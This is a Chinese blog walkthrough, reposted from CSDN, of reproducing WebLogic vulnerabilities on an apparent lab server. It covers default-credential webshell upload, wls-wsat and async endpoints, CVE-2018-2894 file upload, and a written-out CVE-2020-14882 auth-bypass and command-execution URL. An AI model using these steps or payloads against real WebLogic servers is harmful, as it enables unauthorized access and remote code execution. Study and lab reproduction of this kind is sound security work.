自学内容网 自学内容网

WebLogic 漏洞复现

1、后台弱⼝令GetShell

默认账号密码:weblogic/Oracle@123

weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic

这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。

http://47.121.212.195:7001/console

2、登录后台后,点击部署,点击安装,点击上传⽂件。

3、上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

一直点击下一步

4、使用工具进行连接

2、CVE-2017-3506

1、验证是否存在wls-wsat组件

http://47.121.212.195:7001/wls-wsat/CoordinatorPortType

2、在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。

3、CVE-2019-2725

1、http://47.121.212.195:7001/_async/AsyncResponseService  

2、在当前⻚⾯抓包 , 修改请求包 , 写⼊shell

3、访问下载到weblogic服务器上的⽊⻢,进⾏连接

4、CVE-2018-2628

1、

2、直接使⽤利⽤工具

5、CVE-2018-2894

1、这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password

 2、设置Web服务测试开启

域结构 -> base-domain -> ⾼级 -> 启动Web服务测试页

3、点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录

http://47.121.212.195:7001/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4、点击安全 , 点击添加

5、打开控制台, 找到对应时间戳

 

6、Webshell连接

6、CVE-2020-14882

1、访问管理控制台

2、使⽤以下url绕过登录认证

http://47.121.212.195:7001/console/css/%252e%252e%252fconsole.portal

3、⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
http://47.121.212.195:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")


原文地址:https://blog.csdn.net/2301_80402555/article/details/142435869

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!